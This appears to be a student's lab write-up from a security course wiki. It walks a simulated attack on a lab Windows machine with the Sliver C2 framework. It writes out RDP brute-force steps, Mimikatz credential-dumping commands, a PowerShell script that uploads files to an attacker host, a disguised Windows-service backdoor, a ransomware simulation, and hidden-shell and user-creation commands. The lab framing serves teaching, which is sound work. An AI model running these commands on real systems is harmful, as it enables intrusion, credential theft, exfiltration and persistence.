SEC 440 C2 Sliver Part 2 - JadenGil/Jaden-Tech-Journal GitHub Wiki

Installing and configuring Sysmon:

Using this website: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon I downloaded sysmon onto the Windows machine (wks1) extracted the file and moved the contents to the Tools directory,

Before installing I downloaded the sysmon config from this github: https://github.com/SwiftOnSecurity/sysmon-config and added sysmonconfig-export.xml into the Tools directory

Now with the files in the Tools directory open CMD as administrator, cd into C:\Tools, and enter the following command:

image

Now if you take a look in Windows Event Viewer you will see Sysmon is operational.

Deliverable 1:

image

Lateral Movement:

To start off this section we have to make two files users.txt and passwords.txt where we are saving the usernames and passwords for the users on the domain.

image

Now we will want to install crowbar. Just typing in crowbar to the terminal will install it if not already installed:

image

On the Windows machine, remote desktop must be enabled. This is simple to do just type "Remote desktop settings" into the search bar and you'll see a button to enable it.

Now on the Kali machine run the following command with the files that were made before

Deliverable 2:

image

Using hydra you can achieve a similar result.

Deliverable 3:

image

Using "xfreerdp" we can rdp into the Windows machine with the information (admin or not)

Deliverable 4:

image

On the Kali machine start Sliver-server and Sliver-client and on the server start MTLS then back on the Windows machine run the implant from last time as administrator

image

Now that we're connected to the kali machine go back into sliver and run the commands execute -o hostname and execute -o Net localgroup administrators

image

Then we can run the command execute -o powershell Get-MpComputerStatus

Deliverable 5:

image

Now we need to download the Sysinternals to the Kali box which we can download here: https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite

Once they're downloaded we need to make sure they're copied into “/var/www/html/files/” Once they are we can upload this to the Windows machine with Sliver:

image

Deliverable 6:

image

Now we will be simulating mimikatz.

We start this in the Kali box using the command git clone https://github.com/g4uss47/Invoke-Mimikatz

The output should look like this:

image

Back in the terminal running sliver-client use the shell command. The output should look like this:

image

Method 2:

If you don’t want Mimikatz to touch the disk of your target, you can use these commands:

Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command "sekurlsa::logonpasswords"

Note: In order to get this to work I first had to run Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process It wouldn't work until I did this.

The output should look like this (Deliverable 7):

image

Execution, Exfiltration, and Impact

Deliverable 8:

This screenshot shows that I ran the command systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> C:\Users\Public\Documents\info2.txt via rdp on my Kali terminal and a file was made showing the OS Version of windows that the victim box was running:

image

This screenshot shows the same idea but with ipconfig /all using the command ipconfig /all >> C:\Users\Public\Documents\info.txt

image

And this final screenshot show's a similar idea using the command wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows" >> C:\Users\Public\Documents\info3.txt

image

Exfiltration

To start this section I made a file named upload.ps1 containing this content:

Credit goes to alexlehm on github: https://gist.githubusercontent.com/alexlehm/bae63d78bd59c46f4170d27766d2db85/raw/b729ec867d7977295dfd7f98369becd5ca3de9ed/deploy.ps1

# upload file with form-data to a URL using powershell
# this works with binary files, no conversion happens to the file
#
# this can be used to deploy files on Appveryor

$File='result.zip';
$FilePath = Get-Item -Path $File;
$URL = "192.168.1.10/upload.php";

$fileBytes = [System.IO.File]::ReadAllBytes($FilePath);
$fileEnc = [System.Text.Encoding]::GetEncoding('iso-8859-1').GetString($fileBytes);
$boundary = [System.Guid]::NewGuid().ToString(); 
$EOL = "`r`n";

$bodyLines = ( 
    "--$boundary",
    "Content-Disposition: form-data; name=`"file`"; filename=`"$File`"",
    "Content-Type: application/octet-stream",
    "",
    $fileEnc,
    "--$boundary",
    "Content-Disposition: form-data; name=`"filename`"",
    "",
    $File,
    "--$boundary",
    "Content-Disposition: form-data; name=`"apikey`"",
    "",
    "abcd",
    "--$boundary--",
    "" 
) -join $EOL

Invoke-RestMethod -Uri $URL -Method Post -ContentType "multipart/form-data; boundary=`"$boundary`"" -Body $bodyLines

I then started a PHP server with the command php -S 0.0.0.0:80

image

And on sliver-client I uploaded upload.ps1 to the Windows machine:

image

Windows box with up.ps1:

image

We can also check that this was successful by going into the shell on sliver again and navigating to C:\Users\Public\Documents and using the dir command to see that up.ps1 is present.

Deliverable 9:

image

Impact

Now I will be deploying a Windows Service as a backdoor. This is done by first generating a Windows service as an implant and deploying it onto the victim’s system.

profiles new --format service --skip-symbols --mtls 192.168.1.13 win-service

psexec -b C:\\Windows\\System32 -d 'Disk Scheduling Service' -s DskSch.exe -p win-service 192.168.1.13

Deliverable 10:

image

Ransomware Simulation

To get started on this section I first need to download the following files:

LoadObfuscatedScript.ps1

RansomwareSim.ps1

create-vsc.ps1

Dowloaded from here:

https://github.com/ashemery/scripts

File Passwords:

LoadScripts File = WORKSHOP2024

Ransomware File = D0ntD0Th1s@Hom3

Before starting the simulation we will need to run the create-vsc.ps1 once or more to generate a Volume Shadow Copy on the C: volume. (This must be done in a Administrator Powershell Session)

Powershell.exe -noexit -ExecutionPolicy Bypass -File .\LoadObfuscatedScript.ps1 .\create-vsc.ps1 WORKSHOP2024

This is what it'll look like when run:

image

Deliverable 11:

image

Now on sliver we want to run the command .\LoadObfuscatedScript.ps1 RansomwareSim.ps1 WORKSHOP2024

The output should look like this:

image

Deliverable 12:

Encryption:

image

Decryption:

image

Reflection

This lab was long and tough. While I was working on this lab there were never any big issues that occurred during the process but rather a lot of little issues that kept preventing progress. The thing that got me the most was the syntax. The software that was being used was very particular about how it wanted things to be inputted and on occasion, this brought me to a halt because there were times when something wouldn't work well while using Sliver but would work without an issue on the regular Powershell.

On the part where we had to enter these commands:

execute -o Powershell.exe -nop -wind hidden -Exec Bypass "C:\Windows\SysWOW64\cmd.exe"

execute -o net user /add user2 'Passw0rd!'

execute -o net user /add user1 'Passw0rd!'

It just wouldn't work whether I used it in Sliver or Powershell and I ended up having to find a new way to use those same commands and ended up finding these:

Start-Process -WindowStyle Hidden -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command C:\Windows\SysWOW64\cmd.exe"
Start-Process -FilePath "cmd.exe" -ArgumentList "/c net user user2 'Passw0rd!' /add"
Start-Process -FilePath "cmd.exe" -ArgumentList "/c net user user1 'Passw0rd!' /add"

These modified commands worked in the exact same way but it was actually able to play nice with the command lines but I am still unsure what was causing this issue to occur other than the fact that PowerShell doesn't recognize the term "execute".

Those were the only big issues I found myself dealing with during this lab and overall I am feeling a lot more confident with Sliver and Powershell.